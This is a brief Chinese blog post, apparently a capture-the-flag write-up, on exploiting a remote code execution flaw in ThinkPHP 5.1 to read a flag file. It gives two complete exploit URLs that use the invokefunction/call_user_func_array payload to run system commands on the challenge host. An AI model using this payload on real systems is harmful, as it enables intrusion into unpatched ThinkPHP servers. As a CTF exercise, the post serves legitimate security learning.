4.php_rce

1.根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1

2.此版本存在getshell漏洞(百度一下poc一抓一大把)

3.查找flag

http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

 

 http://111.198.29.45:59522/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

 

posted @ 2020-04-01 21:36  Kruskal  阅读(248)  评论(0)    收藏  举报